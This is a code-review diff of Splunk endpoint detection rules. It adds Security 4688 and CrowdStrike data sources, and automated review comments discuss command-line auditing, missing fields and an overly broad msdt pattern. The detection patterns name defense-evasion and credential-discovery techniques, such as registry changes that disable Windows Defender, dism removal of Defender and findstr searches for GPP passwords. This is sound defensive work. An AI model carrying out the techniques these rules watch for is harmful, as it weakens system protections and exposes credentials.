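Review bot: Listing `Windows Event Log Security 4688` for an analytic that, per the description on the line above, keys on specific taskkill command-line parameters only holds when the host audits process creation with the command line included; by default 4688 carries no command-line field, so on that source `Processes.process` is empty and the search never matches. The same caveat applies to the `CrowdStrike ProcessRollup2` entry only if the add-on maps its command-line field to `Processes.process`, which this hunk cannot show. Suggest stating the prerequisite in how_to_implement (outside this hunk), e.g. `For Security 4688 the "Include command line in process creation events" audit policy must be enabled, otherwise Processes.process is empty and this detection cannot match.`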
diff --git a/detections/endpoint/windows_disable_shutdown_button_through_registry.yml b/detections/endpoint/windows_disable_shutdown_button_through_registry.yml
index a34a9efea4..e81ee734ce 100644
--- a/detections/endpoint/windows_disable_shutdown_button_through_registry.yml
+++ b/detections/endpoint/windows_disable_shutdown_button_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious registry modifications th
this could impede system recovery efforts, making it difficult to restart the machine
and remove other harmful modifications.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE ((Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon"
diff --git a/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml b/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml
index 6d858ef12d..930e0fffb4 100644
--- a/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml
+++ b/detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of AppCmd.exe to disable HTT
the intrusion effectively.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where NOT (Processes.parent_process_name IN
("msiexec.exe", "iissetup.exe")) Processes.process_name=appcmd.exe Processes.process
diff --git a/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml b/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml
index 3870d1fb51..48c54a01a2 100644
--- a/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml
+++ b/detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious registry modifications ai
analyze and respond to the attack, allowing the attacker to maintain control and
persist within the compromised environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*"
diff --git a/detections/endpoint/windows_disableantispyware_registry.yml b/detections/endpoint/windows_disableantispyware_registry.yml
index 55092c52fa..22c91d7e31 100644
--- a/detections/endpoint/windows_disableantispyware_registry.yml
+++ b/detections/endpoint/windows_disableantispyware_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the modification of the Windows Regi
malicious activities such as data encryption, exfiltration, or additional system
compromise.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Registry where Registry.registry_value_name="DisableAntiSpyware"
diff --git a/detections/endpoint/windows_diskcryptor_usage.yml b/detections/endpoint/windows_diskcryptor_usage.yml
index c47287a5e0..0a2d6aae6f 100644
--- a/detections/endpoint/windows_diskcryptor_usage.yml
+++ b/detections/endpoint/windows_diskcryptor_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of DiskCryptor, identi
to mitigate potential ransomware attacks.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dcrypt.exe"
OR Processes.original_file_name=dcinst.exe) by Processes.dest Processes.user Processes.parent_process_name
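Review bot: The `Processes.original_file_name=dcinst.exe` branch of this search comes from the PE OriginalFileName that Sysmon EventID 1 records, and Security 4688 has no equivalent field, so for the newly listed 4688 source only the `Processes.process_name="dcrypt.exe"` branch can fire and a renamed binary is missed. Whether the CrowdStrike ProcessRollup2 mapping populates `original_file_name` should be confirmed before advertising that source here. Worth a how_to_implement note (outside this hunk), e.g. `The original_file_name clause needs a source that exposes the PE OriginalFileName (Sysmon EventID 1); Security 4688 can only match on process_name.`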
diff --git a/detections/endpoint/windows_diskshadow_proxy_execution.yml b/detections/endpoint/windows_diskshadow_proxy_execution.yml
index dcfe3f0c2a..7202c0a229 100644
--- a/detections/endpoint/windows_diskshadow_proxy_execution.yml
+++ b/detections/endpoint/windows_diskshadow_proxy_execution.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of DiskShadow.exe in scripti
execution, potentially compromising the system and allowing further malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_diskshadow` (Processes.process=*-s*
OR Processes.process=*/s*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/windows_dism_remove_defender.yml b/detections/endpoint/windows_dism_remove_defender.yml
index 5ebd60115e..7a3bf4d484 100644
--- a/detections/endpoint/windows_dism_remove_defender.yml
+++ b/detections/endpoint/windows_dism_remove_defender.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `dism.exe` to remove Wind
Windows Defender.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dism.exe
(Processes.process="*/online*" AND Processes.process="*/disable-feature*" AND Processes.process="*Windows-Defender*"
diff --git a/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml b/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml
index dd0dea9bce..1dde696bef 100644
--- a/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml
+++ b/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml
@@ -15,6 +15,8 @@ description: The following analytic detects DLL search order hijacking involving
environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=iscsicpl.exe
`windows_shells` by Processes.dest Processes.user Processes.parent_process_name
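Review bot: This search hinges on `Processes.parent_process_name=iscsicpl.exe`, and Security 4688 only populates the Creator Process Name on Windows 10 / Server 2016 and later, so on older hosts the newly listed 4688 source cannot satisfy the parent filter at all and the data_source entry overstates coverage. Suggest a how_to_implement sentence (outside this hunk) such as `For Security 4688, parent process attribution requires Windows 10 / Server 2016 or later where the Creator Process Name field is present.` The `windows_shells` macro is defined elsewhere, so what it matches cannot be checked from this hunk.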
diff --git a/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml b/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml
index 7e98507043..7ac8024482 100644
--- a/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml
+++ b/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies suspicious child processes spawned
by calc.exe, indicative of DLL side-loading techniques. This detection leverages
data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs,
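Review bot: The description on the line above says the analytic focuses on process GUIDs, and neither Security 4688 nor CrowdStrike ProcessRollup2 carries Sysmon's ProcessGuid, so if the search (outside this hunk) groups or joins on `Processes.process_guid` the two newly added sources cannot produce results. Either the search should be confirmed to work on `process_id`/`dest` alone for those sources, or the description should drop the GUID wording so it matches what the added sources can provide. The search body is not visible here, so this is inferred from the description text only.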
diff --git a/detections/endpoint/windows_dns_gather_network_info.yml b/detections/endpoint/windows_dns_gather_network_info.yml
index 2837575cb7..f14d1e23fa 100644
--- a/detections/endpoint/windows_dns_gather_network_info.yml
+++ b/detections/endpoint/windows_dns_gather_network_info.yml
@@ -7,6 +7,8 @@ type: Anomaly
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the use of the dnscmd.exe command to enumerate
DNS records. It leverages data from Endpoint Detection and Response (EDR) agents,
focusing on process command-line executions. This activity is significant as it
diff --git a/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml b/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml
index 3592aa6915..20c4d31540 100644
--- a/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml
+++ b/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of native .NET binarie
maintain persistence within the environment, posing a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path
IN ("*\\Windows\\ADWS\\*","*\\Windows\\SysWOW64*", "*\\Windows\\system32*", "*\\Windows\\NetworkController\\*",
diff --git a/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml b/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml
index f457c864d3..97ace872e1 100644
--- a/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml
+++ b/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
type: Anomaly
status: production
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: 'The following analytic detects the creation of a new DWORD value named
"EnableAt" in the registry path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration".
diff --git a/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml b/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml
index 698fe4bfd8..bbf533cf75 100644
--- a/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml
+++ b/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml
@@ -15,6 +15,8 @@ description: The following analytic detects arbitrary command execution using Wi
persist within the environment, posing a severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=msdt.exe
Processes.process IN ("*msdt*","*ms-msdt:*","*ms-msdt:/id*","*ms-msdt:-id*","*/id*")
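Review bot: The `"*msdt*"` pattern in the `Processes.process IN (...)` list is satisfied by every msdt.exe command line, because `Processes.process` normally begins with the image name, so the more specific `*ms-msdt:*` and `*/id*` patterns add nothing and the filter reduces to any execution of msdt.exe. If the intent is to flag only URI-handler and diagnostic-package invocations, drop the catch-all: `Processes.process IN ("*ms-msdt:*","*ms-msdt:/id*","*ms-msdt:-id*","*/id*")`. For the newly listed Security 4688 source this command-line filter only works when command-line auditing is enabled on the host, which is worth noting in how_to_implement.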
diff --git a/detections/endpoint/windows_file_without_extension_in_critical_folder.yml b/detections/endpoint/windows_file_without_extension_in_critical_folder.yml
index 53286281b3..635c1167de 100644
--- a/detections/endpoint/windows_file_without_extension_in_critical_folder.yml
+++ b/detections/endpoint/windows_file_without_extension_in_critical_folder.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the creation of files without extens
could lead to severe system compromise, including boot sector wiping, resulting
in potential data loss and system inoperability.
data_source:
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem
where Filesystem.file_path IN ("*\\System32\\drivers\\*", "*\\syswow64\\drivers\\*")
by _time span=5m Filesystem.dest Filesystem.user Filesystem.file_name Filesystem.file_path
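Review bot: The new data_source value `Sysmon EventID 1 AND Sysmon EventID 11` declares a process-creation dependency, but the visible part of the search reads only `datamodel=Endpoint.Filesystem` (file creation, i.e. EventID 11); unless the remainder of the search, which runs past this hunk, joins to Endpoint.Processes, EventID 1 is never consumed and the entry overstates the requirement. If the join does exist, a how_to_implement note that both Sysmon event types must be ingested and accelerated for the correlation to work would help operators. Since this is a compound label rather than a single source name, also confirm it resolves to an existing data_source definition under the contentctl version the build now pins.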
diff --git a/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml b/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml
index 76c347c84d..3b1379adc0 100644
--- a/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml
+++ b/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the modification of security permissions
on files or directories using tools like icacls.exe, cacls.exe, or xcacls.exe. It
leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific
diff --git a/detections/endpoint/windows_findstr_gpp_discovery.yml b/detections/endpoint/windows_findstr_gpp_discovery.yml
index 92960180a5..c2d420d05b 100644
--- a/detections/endpoint/windows_findstr_gpp_discovery.yml
+++ b/detections/endpoint/windows_findstr_gpp_discovery.yml
@@ -7,6 +7,8 @@ type: TTP
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the use of the findstr command to search
for unsecured credentials in Group Policy Preferences (GPP). It leverages data from
Endpoint Detection and Response (EDR) agents, focusing on command-line executions
diff --git a/detections/endpoint/windows_hide_notification_features_through_registry.yml b/detections/endpoint/windows_hide_notification_features_through_registry.yml
index 27f2dd8bb8..71c42cefd0 100644
--- a/detections/endpoint/windows_hide_notification_features_through_registry.yml
+++ b/detections/endpoint/windows_hide_notification_features_through_registry.yml
@@ -13,7 +13,7 @@ description: The following analytic detects suspicious registry modifications ai
this could prevent users from noticing critical system alerts, thereby aiding the
attacker in maintaining persistence and furthering their malicious activities undetected.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*"
diff --git a/detections/endpoint/windows_identify_protocol_handlers.yml b/detections/endpoint/windows_identify_protocol_handlers.yml
index 00d46a92f7..da2eb4eb95 100644
--- a/detections/endpoint/windows_identify_protocol_handlers.yml
+++ b/detections/endpoint/windows_identify_protocol_handlers.yml
@@ -14,6 +14,8 @@ description: 'The following analytic identifies the use of protocol handlers exe
or maintain persistence within the environment, posing a significant security risk.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process) as process values(Processes.parent_process)
as parent_process from datamodel=Endpoint.Processes by Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/windows_iis_components_add_new_module.yml b/detections/endpoint/windows_iis_components_add_new_module.yml
index 48273b9ffe..679feaf087 100644
--- a/detections/endpoint/windows_iis_components_add_new_module.yml
+++ b/detections/endpoint/windows_iis_components_add_new_module.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of AppCmd.exe to insta
server.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where NOT (Processes.parent_process_name IN
("msiexec.exe", "iissetup.exe")) Processes.process_name=appcmd.exe Processes.process
diff --git a/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml b/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml
index 210a52c970..277edfbd68 100644
--- a/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml
+++ b/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of a PowerShell commandlet t
leading to further compromise and persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_powershell` AND Processes.process="*Import-Module Applocker*" AND
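Review bot: The `*Import-Module Applocker*` match runs against the process command line, so for the newly listed Security 4688 source it depends on command-line auditing being enabled, and on every source it is bypassed when the cmdlet is invoked from a script file or an encoded command, where the string never appears on the command line. Worth stating in how_to_implement (outside this hunk), e.g. `Security 4688 requires command-line logging to be enabled; invocations via -File or -EncodedCommand are not visible on the command line and need PowerShell script block logging (EventID 4104) to be caught.` The `process_powershell` macro is defined elsewhere, so its scope cannot be checked here.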
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml b/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml
index 40bb659bcf..c7b169a004 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that change the health check interval of Windows Defender. It leverages data from
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml b/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml
index 5f43c86c9f..8e1009bac9 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that change the Windows Defender Quick Scan Interval. It leverages data from the
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml b/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml
index 7112af78f7..e513ac0774 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the ThrottleDetectionEventsRate
registry setting in Windows Defender. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml b/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml
index 1e2532cf69..0ae92aa3fc 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
specifically targeting the "WppTracingLevel" setting within Windows Defender. This
diff --git a/detections/endpoint/windows_impair_defense_configure_app_install_control.yml b/detections/endpoint/windows_impair_defense_configure_app_install_control.yml
index d9c06e6d65..39802aae08 100644
--- a/detections/endpoint/windows_impair_defense_configure_app_install_control.yml
+++ b/detections/endpoint/windows_impair_defense_configure_app_install_control.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable the Windows Defender SmartScreen App Install Control feature. It leverages
diff --git a/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml b/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml
index 209ba10f7d..e60f169f61 100644
--- a/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml
+++ b/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows Defender
ThreatSeverityDefaultAction registry setting. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml b/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml
index 028057a2a4..36d8922ff8 100644
--- a/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml
+++ b/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the deletion of the Windows Defender
further malicious activities such as unauthorized access, persistence, and data
exfiltration.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Registry where Registry.registry_path = "*\\shellex\\ContextMenuHandlers\\EPP"
diff --git a/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml b/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml
index d6b47becd8..15d50803ee 100644
--- a/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml
+++ b/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the deletion of the Windows Defender
ability to detect and respond to further malicious activities, thereby compromising
endpoint security.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Registry where Registry.registry_path = "*\\Policies\\Microsoft\\Windows
diff --git a/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml b/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml
index a40b2650a8..cd90b0102d 100644
--- a/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml
+++ b/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
malicious, this could allow attackers to bypass security measures, facilitating
further malicious activities and persistence within the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group
diff --git a/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml b/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml
index 4fd31eb924..0ef27735e7 100644
--- a/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml
+++ b/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a modification in the Windows registry
that disables the Windows Defender Controlled Folder Access feature. It leverages
diff --git a/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml b/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml
index ce1d9979f6..c5f35b7a7d 100644
--- a/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml
+++ b/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications in the Windows registry
to disable firewall and network protection settings within Windows Defender Security
diff --git a/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml b/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml
index 4ecad8e241..87916a6e12 100644
--- a/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml
+++ b/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable the Windows Defender protocol recognition feature. It leverages data
diff --git a/detections/endpoint/windows_impair_defense_disable_pua_protection.yml b/detections/endpoint/windows_impair_defense_disable_pua_protection.yml
index 645c85539e..7801a8da16 100644
--- a/detections/endpoint/windows_impair_defense_disable_pua_protection.yml
+++ b/detections/endpoint/windows_impair_defense_disable_pua_protection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a modification in the Windows registry
to disable Windows Defender PUA protection by setting PUAProtection to 0. This detection
diff --git a/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml b/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml
index 09bbfd21f9..be20e163d4 100644
--- a/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml
+++ b/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable the Windows Defender real-time signature delivery feature. It leverages
diff --git a/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml b/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml
index ca0db28199..8b4b40941b 100644
--- a/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml
+++ b/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
entry "EnableWebContentEvaluation" to disable Windows Defender web content evaluation.
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml
index 02f4147feb..44e4b0824b 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable Windows Defender Application Guard auditing. It leverages data from
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml
index 1f6f7f35c6..2718885ddc 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable Windows Defender's file hash computation by setting the EnableFileHashComputation
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml
index 13250a24ee..f9ba1e6b7a 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications in the Windows registry
to disable Windows Defender generic reports. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml
index 3829d5bca7..2e972eba4f 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable Windows Defender Network Protection. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml
index 7796d1d06b..3451fb7079 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
